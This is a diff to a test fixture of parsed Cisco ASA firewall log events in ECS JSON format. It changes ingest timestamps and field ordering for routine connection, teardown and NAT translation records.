@@ -14560,7 +14560,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100260600Z", + "ingested": "2021-12-14T14:39:19.188522963Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", @@ -14642,7 +14642,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100266200Z", + "ingested": "2021-12-14T14:39:19.188523363Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", @@ -14721,7 +14721,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100271800Z", + "ingested": "2021-12-14T14:39:19.188523835Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", @@ -14804,7 +14804,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100277300Z", + "ingested": "2021-12-14T14:39:19.188524216Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", @@ -14883,7 +14883,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100282800Z", + "ingested": "2021-12-14T14:39:19.188524593Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", 
@@ -14967,7 +14967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100288400Z", + "ingested": "2021-12-14T14:39:19.188524976Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -15052,7 +15052,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100294Z", + "ingested": "2021-12-14T14:39:19.188525362Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -15137,7 +15137,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100298900Z", + "ingested": "2021-12-14T14:39:19.188525816Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", @@ -15219,7 +15219,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100302400Z", + "ingested": "2021-12-14T14:39:19.188526230Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", @@ -15298,7 +15298,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100306900Z", + "ingested": "2021-12-14T14:39:19.188526617Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", 
@@ -15381,7 +15381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100312100Z", + "ingested": "2021-12-14T14:39:19.188527002Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", @@ -15460,7 +15460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100317Z", + "ingested": "2021-12-14T14:39:19.188527391Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", @@ -15546,7 +15546,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100322700Z", + "ingested": "2021-12-14T14:39:19.188527778Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", @@ -15631,7 +15631,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:34:28.100326900Z", + "ingested": "2021-12-14T14:39:19.188528306Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", @@ -15713,7 +15713,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100331100Z", + "ingested": "2021-12-14T14:39:19.188528685Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", 
@@ -15792,7 +15792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100334600Z", + "ingested": "2021-12-14T14:39:19.188529069Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", @@ -15875,7 +15875,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100338900Z", + "ingested": "2021-12-14T14:39:19.188529446Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", @@ -15954,7 +15954,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100344500Z", + "ingested": "2021-12-14T14:39:19.188529833Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", @@ -15979,22 +15979,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16004,12 +15998,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100350100Z", + "ingested": "2021-12-14T14:39:19.188530216Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", @@ -16023,25 +16020,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16051,12 +16045,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100372600Z", + "ingested": "2021-12-14T14:39:19.188530635Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", @@ -16070,25 +16067,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16098,12 +16092,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100378600Z", + "ingested": "2021-12-14T14:39:19.188531035Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", @@ -16117,25 +16114,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16145,12 +16139,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100384500Z", + "ingested": "2021-12-14T14:39:19.188531433Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", @@ -16164,25 +16161,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16192,12 +16186,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100393200Z", + "ingested": "2021-12-14T14:39:19.188531817Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", @@ -16211,25 +16208,22 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16239,12 +16233,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100399200Z", + "ingested": "2021-12-14T14:39:19.188532195Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", @@ -16258,25 +16255,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16286,12 +16280,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100405200Z", + "ingested": "2021-12-14T14:39:19.188532583Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", @@ -16305,25 +16302,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16333,12 +16327,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100411100Z", + "ingested": "2021-12-14T14:39:19.188533080Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", @@ -16352,25 +16349,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16380,12 +16374,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100417Z", + "ingested": "2021-12-14T14:39:19.188533465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", @@ -16399,25 +16396,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16427,12 +16421,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100422900Z", + "ingested": "2021-12-14T14:39:19.188533850Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", @@ -16446,25 +16443,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16474,12 +16468,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100428800Z", + "ingested": "2021-12-14T14:39:19.188534231Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", @@ -16493,25 +16490,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16521,12 +16515,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100433400Z", + "ingested": "2021-12-14T14:39:19.188534624Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", @@ -16540,25 +16537,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16568,12 +16562,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100437Z", + "ingested": "2021-12-14T14:39:19.188535036Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", @@ -16587,25 +16584,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16615,12 +16609,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100441600Z", + "ingested": "2021-12-14T14:39:19.188535429Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", @@ -16634,25 +16631,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16662,12 +16656,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100447Z", + "ingested": "2021-12-14T14:39:19.188535825Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", @@ -16681,7 +16678,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16742,7 +16742,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100452Z", + "ingested": "2021-12-14T14:39:19.188536216Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", @@ -16821,7 +16821,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100457900Z", + "ingested": "2021-12-14T14:39:19.188536606Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", @@ -16846,22 +16846,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16871,12 +16865,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100462300Z", + "ingested": "2021-12-14T14:39:19.188536996Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", @@ -16890,25 +16887,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16918,12 +16912,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100466700Z", + "ingested": "2021-12-14T14:39:19.188537445Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", @@ -16937,7 +16934,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16999,7 +16999,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100471300Z", + "ingested": "2021-12-14T14:39:19.188537875Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -17083,7 +17083,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100477100Z", + "ingested": "2021-12-14T14:39:19.188538265Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17168,7 +17168,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100483Z", + "ingested": "2021-12-14T14:39:19.188538665Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", @@ -17252,7 +17252,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:34:28.100488800Z", + "ingested": "2021-12-14T14:39:19.188539051Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -17334,7 +17334,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100530100Z", + "ingested": "2021-12-14T14:39:19.188539433Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", @@ -17413,7 +17413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100534300Z", + "ingested": "2021-12-14T14:39:19.188539845Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", 
@@ -17438,22 +17438,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17463,12 +17457,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100538600Z", + "ingested": "2021-12-14T14:39:19.188540238Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", @@ -17482,25 +17479,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17510,12 +17504,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100542200Z", + "ingested": "2021-12-14T14:39:19.188540630Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17529,25 +17526,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17557,12 +17551,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100546100Z", + "ingested": "2021-12-14T14:39:19.188541020Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", @@ -17576,25 +17573,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17604,12 +17598,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:34:28.100551Z", + "ingested": "2021-12-14T14:39:19.188541414Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", 
